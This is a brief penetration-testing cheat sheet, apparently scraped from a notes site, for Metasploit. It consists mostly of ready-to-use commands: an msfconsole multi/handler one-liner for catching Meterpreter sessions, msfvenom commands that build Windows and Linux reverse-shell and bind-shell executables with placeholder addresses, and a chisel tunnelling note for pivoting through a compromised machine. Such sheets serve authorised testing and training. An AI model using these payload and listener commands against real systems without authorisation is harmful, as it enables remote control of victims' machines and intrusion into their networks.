Metasploit
Handler C2 Meterpreter
msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"Payload Windows
Reverse Shell
msfvenom -p windows/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f exe > reverse.exeBind Shell
msfvenom -p windows/meterpreter/bind_tcp RHOST=(IP Address) LPORT=(Your Port) -f exe > bind.exePayload Linux
Reverse Shell
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=(IP Address) LPORT=(Your Port) -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=IP LPORT=PORT -f elf > shell.elfBind Shell
Metasploit Encoder
Metasploit Reverse Payload with Reverse Individual Proxy
tunnel reference:

Compromised Machine

Kali Linux

format: chisel client <server chisel>:<port> R:<linux port>:127.0.0.1:
Generate Payload:
set LHOST to reachable port in compromised machine from target machine.
Handler C2 Meterpreter:
reference:
https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom
Last updated
